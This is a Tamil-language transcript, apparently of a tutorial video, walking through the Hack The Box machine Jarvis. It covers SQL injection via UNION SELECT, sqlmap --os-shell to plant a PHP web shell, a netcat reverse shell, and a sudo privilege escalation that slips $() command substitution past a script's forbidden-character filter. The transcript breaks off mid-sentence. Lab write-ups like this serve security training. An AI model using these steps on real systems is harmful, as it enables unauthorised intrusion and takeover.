ஹாய், வெல்கம் டு தமிழ் பாட்நெட். இன்றைக்கி நம்ம இந்த வீடியோவில் ஹேக் தி பாக்ஸில் ஜார்விஸ் மிஷின் பற்றி தான் பார்க்க போகிறோம். இந்த மிஷினோட ஐபி வந்து என்ன அப்படின்னா 10.10.10.143. நம்ம நார்மலாக எல்லா மிஷினும் பண்ணக்கூடிய வேலைகளை தான் இதில் பண்ண போகிறோம். ஃபஸ்ட்டு என்மே போட்டு ஸ்கேன் பண்ணிடுவோம். அதுக்கப்புறமா அதுக்குண்டான அடுத்த கட்ட வேலைகளை வந்து நம்ம பார்க்கலாம். 143 sorry. ஓகே, இந்த வெர்ஷன் வந்து அப்பர் கேஸில் போட மாட்டேன். ஓகே, ஸ்கேன் ஆகிடுச்சு. இப்போ இந்த மிஷினில் பார்த்தீங்க அப்படின்னா போர்ட் 22 SSH, அதுக்கப்புறமேட்டு போர்ட் 80 நம்மளுக்கு ஓப்பனாக இருக்குது. மற்றபடி வேறு எந்த போர்ட்ஸும் வந்து இதில் இல்லை. போர்ட் 80 ஓப்பனாக இருக்கிறதா வந்து இந்த வெப் அப்ளிகேஷன். ஓகேவா, இது வந்து அந்த வெப் அப்ளிகேஷன்ஸு. இதில் வந்து நம்ம நார்மலாக ஃபஸ்ட் என்ன பண்ணோம்னா robots.txt பார்த்தோம்னா அந்த மாதிரி ஃபைல்ஸ்லாம் எதுவுமே இல்லை. இந்த மிஷினை இந்த பாக்ஸ் வந்து நான் டெஸ்ட் பண்ண வரைக்குமே வந்து இதில் டேரக்டரி ப்ரூட் ஃபோர்ஸ் பண்ணி நம்மளுக்கு வந்து ஒன்றும் ஆக போகிறதில்ல, பெருசாலாம் எதுவும் மாற்றங்கள் கிடைக்காது. என்ன ஒரு PHP மை அட்மின் இருக்கும், அதையும் வேணாலும் நம்ம உள்ளே பைபாஸ் பண்ணிட்டு உள்ளே போய் ஷெல்லெல்லாம் போடலாம். MySQL டேட்டாபேஸ் ஆக்சஸ் பண்ணுறது அந்த மாதிரிலாம் இருக்குது. இருந்தாலும் நம்மளுக்கு வந்து வேறு வழிகளும் இருக்குது. சரிங்களா, ஆக்சுவலாக இந்த எக்ஸசைஸை பொறுத்த வரைக்கும் நம்மளுக்கு வந்து ப்ரூட் ஃபோர்ஸ் பண்ணணும், அதாவது டேரக்டரி ப்ரூட் ஃபோர்ஸ் பண்ணணுன்ற அவசியம் இல்லை. சரி, வேறு என்ன உங்களுக்கு வல்னரபிலிட்டிஸ் இருக்கா அப்படின்னு நீங்கள் பார்க்கலாம். அப்படின்னா அதை வந்து பார்க்கலாம். நீங்கள் வந்து இந்த வேப்லைசர் எக்ஸ்டென்ஷன் வச்சுருந்தீங்கன்னா உங்களுக்கு தெரியும். இந்த நம்ம ஓப்பன் பண்ணுற வெப் ஆப் வந்து என்ன கண்டென்ட் மேனேஜ்மெண்ட் சிஸ்டமில் ஒர்க் ஆகுது அப்படிங்கிறத முதற்கொண்டு காட்டும். இது வந்து PHP தான். நார்மலாக நம்மளுக்கு PHPனாலே ஃபஸ்ட் என்ன பண்ணுவோம், SQL இன்ஜெக்ஷன் இந்த மாதிரி அட்மின் பேனலில் பைபாஸ் பண்ணுறது, இந்த மாதிரி தான் வந்து நம்ம ட்ரை பண்ணி பார்ப்போம். இந்த மிஷின் இந்த ஆப்லேயும் வந்து என்ன இருக்குது அப்படின்னா வந்து SQL இன்ஜெக்ஷன் வல்னரபிலிட்டி இருக்குது. இது வந்து எங்கே இருக்குது அப்படின்னா இங்கே ரூம்ஸ்னு இருக்கா, இந்த டேபுக்கு போய்ட்டு நீங்கள் பார்த்தீங்கனாலே உங்களுக்கு தெரியும். இதுலேருந்து வேறு நிறைய ரூம்ஸ் செலக்ட் பண்ணுற ஆப்ஷன்ஸ் இருக்குது. ஒவ்வொரு ரூமுக்கும் ஒவ்வொரு ரேண்டமாக அந்த பேராமீட்டரில் நம்பர் வந்து நம்மளுக்கு மாறிட்டே இருக்கும். ஸோ 3 6 6 இருக்குது. ஓகேவா, இதில் எதாவது ஒன்று ஓப்பன் பண்ணுவோம். இல்லை நம்ம ஓப்பன் பண்ணி பார்க்குறப்ப என்ன இருக்குன்னா டோட்டலாக 6 இருக்கா, 6ன்னு கொடுப்போம். அடுத்தது 7ன்னு கொடுத்து பார்த்தா ஏதாவது வருதான்னு பார்ப்போம். 7ங்கிற பேராமீட்டரில் ஒன்றும் இல்லை. ஸோ வந்து நம்மளுக்கு நார்மல் எம்டி பேஜஸ் தான் ஓப்பன் ஆகுது. சரி, இப்போ நம்ம 1வது பேஜில் இருந்துட்டு அதில் சிங்கிள் கோட் கொடுத்தோம் அப்படின்னு வச்சுக்கோங்களேன். அதில் நீங்கள் பார்த்தீங்க அப்படின்னா உங்களுக்கு வந்து நார்மலாக வந்து ஒரு எம்டி பேஜ் தான் அது. அது வந்து சிங்கிள் கோட் இல்லாமல் பார்த்தோம் அப்படின்னா நம்மளுக்கு வந்து அந்த ரூம் இருக்கிற அந்த ரேட்டோட சேர்த்து சுப்பீரியர் ஃபேமிலி ரூம் அப்படிங்கிறது நம்மளுக்கு காட்டுது. ரூம்ஸ் மாதிரி இது ஏதோ ஒரு வெப்சைட் தான் போல். ஓகே, இதில் பார்த்தா நம்மளுக்கு தெரியும். நம்மளுக்கு வந்து மோஸ்ட்லி நம்ம சைட்டில் வந்து ஆரம்ப காலத்தில் நம்ம ஆரம்பித்தப்போ வந்து SQL இன்ஜெக்ஷனை தான் வந்து கவர் பண்ணியிருப்போம். அந்த SQL இன்ஜெக்ஷன் சீரிஸ் பார்த்துருந்தீங்க அப்படின்னா நம்ம அடுத்தடுத்ததாக சொல்ல போகிற கமெண்ட்ஸ் வந்து உங்களுக்கு புரியும். அப்படி புரியலனாலும் ஒன்றும் பிரச்சனை இல்லை. அதை வந்து SQL மேப்லேன்னு வச்சு நம்ம டெமோ பார்ப்போம், அப்போதைக்கு உங்களுக்கு புரியும். நம்ம சேனல் வந்து SQL இன்ஜெக்ஷனோட பேசிக்ஸும் அதுக்கப்புறம் SQL மேப் எப்படி யூஸ் பண்ணுங்கிறதுமே வந்து டியூட்டோரியல்ஸ் இருக்குது. ஒருவேளை இந்த இது புரியல அப்படின்னா நீங்கள் அதில் போய் பார்த்தீங்கன்னா உங்களுக்கு வந்து புரிய வாய்ப்பு இருக்குது. நம்ம அடுத்து என்ன பண்ணோம்னா ஆர்டர் பை கமாண்டை வந்து எக்ஸிக்யூட் பண்ணி பார்ப்போம். அதானே ஆர்டர் பையில் போயிட்டு சும்மா ஒரு 10ன்னு கொடுப்போம். 10ன்னு கொடுத்தா நம்மளுக்கு வந்து என்ன ஆகுது, நார்மலாக லோட் ஆகுது. 8 7ன்னு கொடுத்தோம்னா நம்மளுக்கு வந்து ஒரு பேஜ் வந்து காட்டுது, சுப்பீரியர் ஃபேமிலி வந்து காட்டுது. அதுவே 8ன்னு கொடுத்தா என்ன ஆகுது, வெறும் எம்டியாக வருது. ஸோ அதில் வந்து நம்மளுக்கு 7 இருக்குது அப்படிங்கிறது தெரிஞ்சிருச்சு. இப்போ வந்து அடுத்து என்ன பண்ணுவோம் அப்படின்னா யூனியன் பெஸ்ட் கமாண்ட் வந்து நம்ம யூஸ் பண்ணுவோம். யூனியன் செலக்ட் 1, 2, 3, 4, 5, 6, 7 இதில் கொடுத்தா நம்மளுக்கு வந்து எதுவுமே எக்ஸிக்யூட் ஆகலை. ஏன்னா நம்மளுக்கு வந்து இங்கே வந்து பேலன்ஸ் வந்து சரியாக பண்ணலை. அதாவது இந்த URL இருக்குல்ல, லெஃப்ட் ஹேண்ட் சைடு ரைட் ஹேண்ட் சைடு வந்து நம்மளுக்கு வந்து URL வந்து கொரிஸ் வந்து கரெக்டாக பேலன்ஸ் பண்ணணும். இல்லைனா நம்மளுக்கு வந்து கரெக்டான அவுட்புட் வராது அப்படிங்கிறத நம்ம அந்த பழைய வீடியோஸ்லாம் பார்த்துருப்போம். அதே தான் இப்போ வந்து உங்களுக்கு இந்த வல்னரபிளான காலம்ஸ் எல்லாமே காட்டுதான். இந்த இடத்துல போய்ட்டு எந்த உங்களுக்கு இன்ஜெக்ஷன் பாயிண்ட் காட்டுதோ அந்த இடத்துல போய்ட்டு நம்மளுக்கு வேணுங்கிற கொரிஸை கொடுத்தோம் அப்படின்னா டேட்டாபேஸ் வந்து டம்ப் பண்ண முடியும். இப்போ இதில் பார்த்தீங்கன்னா வந்து உங்களுக்கு வெர்ஷன் இருக்கா,
ஓகே, இதே மாதிரியே நம்ம இதில் வந்து என்னென்னா ரைட்டபிள் ஆக்சஸ் வந்து எனபிள் இருக்குது. ஸோ நம்மளால் வந்து ஷெல்லை வந்து அப்லோட் பண்ணுற மாதிரி ஆப்ஷன்ஸ் இருக்குது. ஷெல் அப்லோட் பண்ண முடியுதுல. அந்த ஷெல் அப்லோட் பண்ணோம் அப்படின்னா உங்களுக்கு இது எப்படிங்கிறத காமிச்சிடுறேன். SQL மேப்பில் ஒரு ஆப்ஷன் இருக்குது, SQL map -u. அதில் வந்து என்ன பண்ணுறோம், இந்த வல்னரபிளான URL வந்து நம்ம எடுத்துக்கணும். காப்பி பண்ணி பேஸ்ட் பண்ணிவிட்டு -os shell ஒரு நிமிஷம், கொடுத்த கமெண்ட் வந்து கரெக்டானு பார்த்துக்கிறேன். SQL map -h ஷெல் அப்லோட் பண்ணுறதுக்கு OS shell கமாண்ட் தான் யூஸ் பண்ணுவோம். அதில் நான் கொடுத்த ஆர்குமெண்ட் வந்து ரைட்டாக தப்பான்னு தெரில. -was கரெக்டு தான். ஓகே, இதுதானே கொடுத்தேன். ஆமாம், இப்போ கொடுத்து நம்ம செக் பண்ணுவோம். இதில் வந்து என்னென்னா கொஞ்சம் வேஃப் இருக்குது. நம்ம இந்த மாதிரி ரேண்டமாக ட்ரை பண்ணுறப்ப என்ன பண்ணோம்னா நம்மளை வந்து ஒரு 90 செகண்டுக்கு வந்து பிளாக் பண்ணும். இதில் வந்து டிஃபால்ட்டாக கொடுக்குறோம். ஷெல் அப்லோட் பண்ணது ஆப்ஷனுக்கு என்ன பண்ணுது இப்போனா நம்மளுக்கு வந்து மேனுவலாக போட்டு ஷெல்லோட ஆக்சஸ் கொடுத்துருச்சு. SQL மேப்லேயே வந்து என்ன இருக்குன்னா, இந்த டிஃபால்ட்டாக வந்து ஷெல் நிறைய வெரைட்டிஸ் ஆஃப் ஷெல்ஸ் வந்து உள்ளே வச்சுருப்பாங்க. நம்ம டிஃபால்ட்டாக இந்த மாதிரி OS shell கமாண்ட் கொடுக்குறப்ப என்ன பண்ணோம்னா அதுக்குள்ளே SQL மேப்புக்குள்ளே இன்பில்டாக இருக்கிற சில PHP ஃபைல்ஸ் எல்லாம் வந்து அப்லோட் பண்ணிவிட்டு நம்மளுக்கு வந்து என்ன பண்ணணும்னா அந்த லிங்க் வந்து கொடுக்கும். அந்த லிங்க்லாம் வந்து எங்கே இருக்குன்னா இங்கே இருக்கும். சரிங்களா, அதை காப்பி பண்ணி அப்படியே நம்ம ப்ரௌசரில் கொடுத்தோம் அப்படின்னா நம்மளுக்கு வந்து இந்த ஷெல்லோட ஆக்சஸ் வரும். இப்போ இந்த இடத்துல போயிட்டு நம்மளோட வேறு ஷெல் ஏதாவது ஒன்று அப்லோட் பண்ணி இது வந்து என்னென்னா ஜஸ்ட் ஒரு அப்லோடர் தான். இது வந்து PHP ஷெல்லுன்னு கூட சொல்ல முடியாது, ஜஸ்ட் ஒரு அப்லோடரு. ஷெல்லு ஆனால் என்ன உள்ளே இருக்குது, அதை வேணாலும் நம்ம யூஸ் பண்ணிக்கலாம். இந்த அப்லோடர் வழியாக நம்ம ஆக்சஸ் பண்ணிவிட்டு நம்மளோட ஸ்டேபிள் ஷெல் ஏதாவது இருந்துச்சு அப்படின்னா நம்மளால் வந்து இதை அப்லோட் பண்ண முடியும். அப்லோட் பண்ணிவிட்டு அந்த ஷெல்லில் வந்து நான் என்ன வச்சுருந்தேன்னா PHP shell.phpன்னு வச்சுருந்தேன். ஸோ shell.php இப்போ பார்த்தீங்கன்னா அதில் CMD இருக்கும். இந்த CMD பேராமீட்டர் வழியாக போயிட்டு நம்ம அதை வந்து ஆக்சஸ் பண்ணிக்கலாம். shell.php $CMD =ls இதை கொடுத்தோன்னா உள்ளே இருக்கிற நம்மளுக்கு வந்து லிஸ்ட் அவுட் பண்ணுறது டெர்மினல் ஆக்சஸ் மாதிரி கிடச்சிருக்கு. இதெல்லாம் வந்து நம்ம ஆல்ரெடி பைத்தானில் வந்து எக்ஸ்பர்ட் டெவலப் பண்ணுறது எப்படிங்கிறது அந்த பேசிக் இதுக்கு அம்சமா அப்போ வந்து அதில் பார்த்துருப்போம், இந்த கமாண்ட் இன்ஜெக்ஷன் இந்த மாதிரி எல்லாமே. இப்போ இதில் வந்து என்ன பண்ணுவோம் அப்படின்னா நெட்கேட்டை வச்சு நம்ம ரிவர்ஸ் ஷெல் எடுப்போம். ஆல்ரெடி நம்ம நெட்கேட்டில் வந்து ரிவர்ஸ் ஷெல் எப்படி வெப் அப்ளிகேஷன்லேருந்து எடுக்கிறது, ரிவர்ஸ் ஷெல்லில் அப்புறமேட்டு பைண்ட் ஷெல்லுக்கு வந்து எப்படி வித்தியாசம் இருக்கும் அப்படிங்கிறதுலாம் நம்ம அந்த வீடியோவில் வந்து இந்த மாதிரி வெப் அப்ளிகேஷன்லேருந்து தான் அப்லோட் பண்ணி நான் உங்களுக்கு காமிச்சிருப்பேன். சேம் அதே தான், நீங்கள் அந்த வீடியோலாம் பார்த்தீங்க அப்படின்னா இதெல்லாம் வந்து உங்களுக்கு புரியும். இப்போ வந்து இதுதான் வந்து என்னோடய சிஸ்டம் IP, நான் நோட் பண்ணி வச்சுக்கிறேன். நான் அடிக்கடி தேவைப்படும், நான் மறந்துடுவேன் லைட்டாக. இப்போ வந்து NC-NVLP நெட்கேட்டில் என்ன போட்டு ஓப்பன் பண்ணலாம். சரி, 2000 ஒரு போர்ட் வந்து நான் ஓப்பன் பண்ணிக்கிறேன், லிசன் பண்ணி வச்சுக்கிறேன். இந்த போர்ட்டில் தான் வந்து நான் இப்போ எக்ஸிக்யூட் பண்ண போகிறேன். ரிவர்ஸ் ஷெல்ல காப்பி netcat -e bin sh port 2000. ஓகே, நம்மளுக்கு இதில் ரிவர்ஸ் ஷெல் வந்து நம்மளுக்கு வந்துருச்சு. இந்த வெப் அப்ளிகேஷன்லேருந்து ஐடி போட்டு பார்த்தோம் அப்படின்னா நம்மளுக்கு வந்து www டேட்டாக்குள்ளே தான் இருப்போம். சரிங்களா, இதை போய்ட்டு pty ஷெல் நம்ம எடுத்துக்குவோம். python-c import pty.spawn bin/sh. ஓகே, நம்மளுக்கு வந்துருச்சு. இப்போ இதில் வந்து நம்ம என்ன பண்ணோன்னா
இந்த www டேட்டாலேருந்து www டேட்டா யூசர்லேருந்து நம்ம வந்து நார்மல் யூசருக்கு போகணும் சரிங்களா. அப்போ அந்த யூசருக்கு போகணும் அப்படின்னா நம்ம என்ன பண்ணணும்னா சம் ப்ரிவிலேஜ் எஸ்கலேஷன் வந்து நம்ம இந்த இடத்துல பெர்ஃபார்ம் பண்ணி ஆகணும் சரிங்களா. அப்போ அதை பெர்ஃபார்ம் பண்ணி ஆகணும் அப்படின்னா நீங்கள் வந்து PSPY இந்த மாதிரிலாம் எதுவும் போட்டு போகணுன்ற அவசியம் கிடையாது. இது வந்து சிம்பிள் தான் இந்த மிஷினை பொறுத்த வரைக்கும். உங்களுக்கு வந்து ஹிண்ட்ல இதில் வந்து நீங்கள் லினக்ஸில் ப்ரிவிலேஜ் எஸ்கலேஷன் வந்து பிகினர்ஸ்னு இல்லை, நார்மலாக வந்து ப்ரிவிலேஜ் எஸ்கலேஷன் ஃபார் லினக்ஸ்ன்னு நீங்கள் போட்டு படித்து பார்த்தீங்கன்னாலே உங்களுக்கு வந்து நிறையா மெத்தட்ஸ் வந்து சொல்லியிருப்பாங்க. அதில் வந்து சூடோ அப்யூசிங்னு சொல்லுவாங்க சரிங்களா. அதில் வந்து சூடோ யூசர்ஸில் மூலமாக அப்யூஸ் பண்ணலாம். அதில் ஒரு சில ப்ரோக்ராமுக்கு ஒரு சில கமாண்டுக்கு மட்டும் ஒரு யூசர்லேருந்து இன்னொரு யூசர் வந்து யூஸ் பண்ணலாம் அப்படின்ற மாதிரி நோ பாஸ்வேர்டு ரெக்யூர் அப்படின்ற மாதிரிலாம் கொடுத்துருப்பாங்க. அது மூலமாக நம்மளால் ஒரு சில ஆக்சஸ் வந்து எடுக்க முடியும். உதாரணத்துக்கு விம் மூலமாலாம் விம் எடிட்டர் இருக்கும்ல, அது மூலமாலாம் சில சமயம் வந்து ரிவர்ஸ் கனெக்ஷன் வந்து எடுப்பாங்க சரிங்களா. அந்த மாதிரி எடுக்கலாம். அதுக்கெல்லாம் நீங்கள் செக் பண்ணோம் அப்படின்னா sudo -l அப்படின்னு போட்டு பார்த்தீங்கன்னா வச்சுக்கோங்களேன், இதில் வந்து போட்டிருப்பாங்க. அதாவது பெப்பர்ன்ற ஒரு யூசர் வந்து இந்த சர்வரில் இருக்காரு சரிங்களா. அந்த யூசர் மூலமா நீங்கள் வந்து நோ பாஸ்வேர்டு வந்து தேவையில்லை. இந்த simpler.py ஸ்கிரிப்ட் வந்து நீங்கள் எக்ஸிக்யூட் பண்ணுறதுக்கு இந்த ஜார்விஸ் மிஷினில் அதான் இங்கே உங்களுக்கு வந்து இங்கே கொடுத்துருக்காங்க சரிங்களா. இதை படித்து பார்த்தீங்கனாலே உங்களுக்கு புரியும். அந்த simpler.py வந்து எங்கே இருக்குது அப்படின்னா அட்மின் யூட்டிலிட்டிஸ் டைரக்டரிக்குள்ளே இருக்குது. pwd கொடுத்தோம்னா வந்து அந்த டைரக்டரியில் இருக்கும். உள்ளே எல்எஸ் பண்ணி பார்த்தோம் அப்படின்னா simpler.py அப்படின்ற ஒரு ஃபைல் இருக்குது. என்சின்னு ஒன்று இருக்குது. அது வேறு யாரோ உள்ள இப்போ வேறு யாரும் மற்ற பிளேயர்ஸ் யாரும் உள்ளே ஆக்டிவாக இருப்பாங்க போல, அவங்க ரைட் பண்ணியிருக்காங்க. சரி, இந்த simpler.pyல வந்து என்ன இருக்குது அப்படிங்கிறதே நம்ம வந்து உள்ளே ரீட் பண்ணி பார்க்கலாம். கேட் simpler.py எடுத்திங்கன்னா உள்ளதோட சோர்ஸ் கோட் இருக்குது, பேனர் இந்த மாதிரி ஆப்ஷன்ஸ் எல்லாம் இருக்குது. அதுலேயே வந்து உங்களுக்கு மேலே வந்து ஆப்ஷன் கொடுத்துருக்காங்க பாருங்களேன். அது வந்து ஷோ பண்ணுறதுக்கு ஒன்று -h ஹெல்ப்புக்கு, அடுத்து வந்து S வந்து ஸ்டாட்டிஸ்டிக்ஸு, L வந்து லிஸ்ட் அட்டாக்கர்ஸ் ஐபி, P வந்து எதுக்குன்னா பிங் அண்ட் அட்டாக்கர் ஐபி அது மாதிரி கொடுத்துருக்காங்க. உள்ளே வந்து ஒவ்வொரு ஃபங்க்ஷன் கொடுத்துருக்காங்க. இந்த டெஃப்ன்ற கீவேர்டை பார்த்தாலே நம்மளுக்கு வந்து அது ஃபங்க்ஷன் நம்மளுக்கு தெரிஞ்சிடும். ஸ்டாட்டிஸ்டிக்ஸ் நம்மளுக்கு தேவையில்ல. அடுத்தது லிஸ்ட் ஐபி. இந்த லிஸ்ட் ஐபியோடது வந்து எங்கே இருக்குன்னா ஹோம் டைரக்டரியில் பெப்பர்ன்ற யூஸரில் வெப்பில் /logsன்ற டைரக்டரிஸில் வந்து இருக்குது. ஓகே, அடுத்து டேட் டு நம்பர், இது நம்மளுக்கு தேவையில்ல. வேறு ஏதாவது இங்கே ஒரு ஃபங்க்ஷன் இருக்குது exec_ping அப்படின்ற ஒரு ஃபங்க்ஷன் இருக்குது. அதில் பார்த்தீங்கன்னா forbidden அப்படின்னு கொடுத்துருக்காங்களா. அதில் வந்து இந்த மாதிரி சில ஸ்பெஷல் கேரக்டர் வந்து கொடுத்துருக்காங்க. இந்த கேரக்டர் வந்து எல்லாமே என்னன்னா நம்ம லினக்ஸில் வந்து கமாண்ட் எக்ஸிக்யூஷன் வந்து பர்ஃபார்ம் பண்ணுறதுக்காக யூஸ் பண்ணக்கூடிய கமாண்ட்ஸுக்கு இது எல்லாமே. அண்டு ஆறு இந்த ஆப்ரேட்டர் எல்லாமே இருக்குது பார்த்தீங்களா. அது போக இந்த செமிகோலனும் கொடுத்துருக்காங்க. செமிகோலன் வச்சும் நம்ம அது பக்கத்தில் கூடவே வந்து இன்னொரு லைன் வந்து ரன் பண்ணலாம் சரிங்களா. அந்த மாதிரி ஆப்ஷன் எல்லாத்தையும் வந்து ஃபார்பிடன் கொடுத்துருக்காங்க. அடுத்தது கமாண்ட் இன்புட் என்டர் அண்ட் ஐபி, அதாவது நம்ம ஐபி வந்து இந்த இடத்துல கொடுக்குற மாதிரி இருக்குது. ஃபார் லூப் வந்து ஒன்று யூஸ் பண்ணியிருக்காங்க, ஃபார்பிடன்லேருந்து வருது. அதாவது ஃபார்பிடனில் ஐக்குள்ளே வந்து இந்த கமாண்ட்ஸில் ஏதாவது ஒன்று வந்துச்சுனாலும் காட்டியோ அப்படின்ட்டு நம்மளுக்கு பிரிண்ட் பண்ணும் சரிங்களா. காட்டியோன்னா உங்களை கண்டுபிடிச்சி உங்களை வந்து எக்ஸிக்யூட் பண்ண விட மாட்டேன் அப்படின்னு சொல்லுது சரிங்களா. அப்படி இல்லை அப்படின்னா என்ன ஆகுனா os.systemல போயிட்டு பிங் பண்ணும். பிங்கு ப்ளஸ் நம்ம கொடுக்குற கமாண்ட் வந்து எக்ஸிக்யூட் ஆகும் சரிங்களா. பிங் பண்ணுறது வந்து என்னென்னா நார்மலாக இந்த மிஷினில் இருக்கிற ஆப்ஷன் தான். பிங் அப்படின்னு போட்டு 8 போட்டோம் அப்படின்னா நம்மளுக்கு பிங் ஆகும்ல. அதே தான் os.system வந்து யூஸ் பண்ணியிருக்காங்க. அதான் நம்ம நார்மலாக டெர்மினலில் யூஸ் பண்ணக்கூடிய எல்லாத்தையுமே வந்து யூஸ் பண்ண முடியும் பைத்தானில். அதுக்கு தான் வந்து இந்த OS மாடியூல் வந்து யூஸ் பண்ணியிருக்காங்க. அடுத்தது மெயின் வந்துருச்சா அதெல்லாம் ஓகே. அடுத்து வந்து என்ன சொல்லியிருக்காங்கன்னா இஃபெல்ஸ் வந்து யூஸ் பண்ணியிருக்காங்க. அதில் வந்து ஒவ்வொரு ஆர்குமெண்ட்டாக இருந்துச்சா, ஹெச்னா நம்மளுக்கு இதை பண்ணு, எஸ்ன்னா இதை பண்ணு அப்படின்னு சொல்லியிருக்காங்களா லிஸ்ட் த அட்டாக்கர்ன்ட்டு. அதே மாதிரி நம்மளுக்கு வந்து இந்த exec_ping வந்து யூஸ் பண்ணோம் அப்படின்னா -p வந்து யூஸ் பண்ணணும் சரிங்களா. அதை தான் நம்மளுக்கு அங்கே சொல்லியிருக்காங்க. ஸோ அதை நம்ம பண்ணுறதுக்கு முன்னாடி அதில் வந்து இன்னொரு வேலை ஒன்று பண்ணணும். என்ன அப்படின்னா டெம்ப் ஃபைலுக்குள்ளே போயிட்டு நம்ம ஒரு ரிவர்ஷல் வந்து நம்ம போஸ்ட் பண்ணிடணும், சாரி டவுன்லோட் பண்ணி வச்சிடணும் சரிங்களா. அந்த ரிவர்ஷல் மூலமாக தான் நம்மளால்
நம்மளால் வந்து ரிவர்சல் எடுக்க முடியும். ஏன்னா இப்போ நெட்கேட் வந்து நீங்கள் அந்த இடத்துல யூஸ் பண்ணிங்கன்னா அந்த ஹைஃபன் இந்த சிம்பிள்லாம் போட்டால் நம்மளுக்கு வந்து காட்டியூன்னு சொல்லும். அதாவது அதெல்லாம் அந்த கேரக்டர்லாம் அந்த யூஸ் பண்ணக்கூடாதுன்னு இருக்கா. ஸோ நம்மளால் அதை வந்து எக்ஸிக்யூட் பண்ண முடியாது. ஸோ அதனால் நீங்கள் இந்த மாதிரி ஃபைல்ஸை போட்டிங்க அப்படின்னா அது பாட்டுக்கு ரன் பண்ணி விட்ரும், நம்மளுக்கு ரிவர்ஸ் கனெக்ஷன் வந்துடும். இதுதான் வந்து என் சிஸ்டமோட ஐபி, இந்த இடத்துல நோட் பண்ணி வச்சுருக்கேன். ஓகேவா? இந்த ஐபி 7000 போர்ட்டில் வந்து நம்மளுக்கு வந்து நெட்கேட் வந்து லிசன் பண்ண வைக்கணும். NC-NVLP இந்த ப்ரொசீஜர்லாம் வந்து மோஸ்ட்லி நம்ம பார்த்தது தான், அதனால உங்களுக்கு ஃபஸ்ட்லேருந்து காட்டணுன்ற அவசியம் கிடையாது, அவசியம் இருக்காதுன்னு நினைக்கிறேன். சரி, இப்போ வந்து நம்ம என்ன பண்ணோம்னா அடுத்தது அந்த அட்மினோட யூட்டிலிட்டிஸ் பேஜுக்குள்ளே போகலாம். இந்த டைரக்டரியில் போகிறோம். போயிட்டு simpler.py இருக்குது. இதை வந்து எப்படி ரன் பண்ணணும்னா அந்த யூசரோட வச்சு தான் நம்மளால் ரன் பண்ண முடியும். இப்போ sudo -u pepperன்ற யூசர் மூலமாக போயிட்டு /simpler.py -p அப்படி கொடுத்தோன்னா நமக்கு வந்து இந்த ஸ்கிரிப்ட் வந்து எக்ஸிக்யூட் ஆக ஆரம்பிச்சிடும். நீங்கள் வந்து ஏன் / யூஸ் பண்ணாமல் டேரெக்டாக அங்கே வந்து பைத்தான்னு போட்டிங்கன்னா வச்சுக்கோங்களேன், உங்களுக்கு வந்து என்னென்னா சூடோவில் இந்த யூஸ் பண்ணனால பாஸ்வேர்டு கேட்கும். அதனால் // வந்து நீங்கள் யூஸ் பண்ணிடுங்க. 27.0.0.1 அதுக்கப்புறமேட்டு இந்த $சிம்பிள், இந்த $சிம்பிள் மூலமாக வந்து நம்மளால் கமாண்ட் எக்ஸிக்யூஷன் வந்து பெர்ஃபார்ம் பண்ண முடியும். நீங்கள் வந்து கூகுளில் சும்மா சர்ச் பண்ணி பார்த்தீங்கன்னா போதும். ஆஃபஸ்கேஷன் சொல்லுவாங்க, இதெல்லாம் வந்து ஆஃபஸ்கேஷன் ஆர் பைபாஸிங் எல்லாம் சொல்லுவாங்க. கமாண்ட் எக்ஸிக்யூஷன் வந்து எப்படி பைபாஸ் பண்ணுறது, சும்மா DVWக்குன்னு நீங்கள் போட்டிங்கனாலே இந்த மாதிரி கேரக்டர்லாம் வந்து போட்டிருப்பாங்க, அதை வச்சு பார்த்தீங்கன்னா உங்களுக்கு தெரியும் $சிம்பிளை வச்சு நம்மளால் பைபாஸ் பண்ண முடியும் அப்படின்னு. ஏன்னா இந்த $சிம்பிள் மட்டும்தான் இந்த ஃபார்பிடன்ற ஃபங்க்ஷனுக்குள்ளே வந்து இல்லை, சரி ஃபார்பிடன்ற லிஸ்ட்டுக்குள்ளே இல்லை. ஸோ நம்மளால் அது பண்ண முடியும். இதுமாதிரி பிங்குன்னு வருது, இதுமாதிரி வரக்கூடாது. அப்படி நார்மலாக அங்கே பிங் ஆச்சுனாலே நம்மளுக்கு வந்து கமாண்ட் எக்ஸிக்யூட் ஆகாமல் அங்கே ஏதோ ஒரு பிரச்சனை இருக்குன்னு அர்த்தம். ஓகே, இதை நான் ஸ்டாப் பண்ணுறேன். திரும்ப நான் இங்கே ஷெல் எடுக்கிறேன், திரும்ப அதை எக்ஸிக்யூட் பண்ணி cd temp நம்மளோட பைத்தான் ஃபைலுக்கு வந்து எக்ஸிக்யூட்டபிள் பர்மிஷன் இருக்கணும், சரிங்களா? அது மாதிரி எக்ஸிக்யூட்டபிள் பர்மிஷன் இல்லை அப்படின்னா நம்மளுக்கு வந்து அந்த ஸ்கிரிப்ட் வந்து உங்களுக்கு அங்கே ரன் ஆனாலும் இங்கே வந்து ஒர்க் ஆகாது. py.pyக்கு வந்து chmod போட்டு நம்ம வந்து எக்ஸிக்யூட் பண்ணிடுறோம். இப்போ வந்து ls-la கொடுத்தோம் அப்படின்னா பைத்தான் ஃபைலுக்கு வந்து இப்போ எக்ஸிக்யூட்டபிள் பர்மிஷன் வந்துருச்சு. இப்போ நம்மளால் போய்ட்டு அதை ரன் பண்ண முடியும். மோஸ்ட்லி இந்த மாதிரி ஒரு சில தப்புகள்லாம் நான் நிறையாவே பண்ணுவேன். ஏன்னா இந்த மாதிரி டெம்ப் டைரக்டரியில் போடுறோம் அப்படின்னாலே அதுக்குள்ளே வந்து நம்ம பர்மிஷன் வச்சு விட்றணும் எப்பொழுதுமே. ஓகே, sudo -u pepper./simpler.py -p 127.0.0.1 $symbol temp py.py. இங்கேருந்து லிசனர் ஸ்டார்ட்டில் தான் இருக்குது நம்புகிறேன். ஓகே, இப்போ வந்து நம்மளுக்கு பிங் வந்து எக்ஸிக்யூட் ஆகலை பார்த்தீங்களா? நம்ம வந்து நார்மலாக நீங்கள் இந்த DVW என்னோட வீடியோ பார்த்துருந்தீங்கனாலே உங்களுக்கு தெரிஞ்சிருக்கும். அதில் வந்து நம்மளுக்கு ரிவர்ஸ் கனெக்ஷன் போகுது அப்படின்னா அந்த பேஜ் வந்து லோட் ஆகுது. கனெக்ஷன் கட்டானா நார்மலாக வந்து ஃபுல்லாக லோட் ஆக ஆரம்பிச்சிடும். அதுதான் இப்போ இங்கேருந்து லிசனர் ஸ்டார்ட் பண்ணோமா, அந்த லிசனர் வந்துருச்சு பார்த்தீங்களா இங்கே. இப்போ போயிட்டு நம்ம ஐடி அப்படின்னு கொடுத்தோம் அப்படின்னா நம்மளுக்கு வந்து பெப்பர்ன்ற யூசரில் 